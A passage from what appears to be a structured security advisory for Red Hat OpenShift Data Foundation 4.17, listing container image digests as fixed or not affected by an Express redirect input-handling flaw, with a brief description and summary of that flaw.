"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", 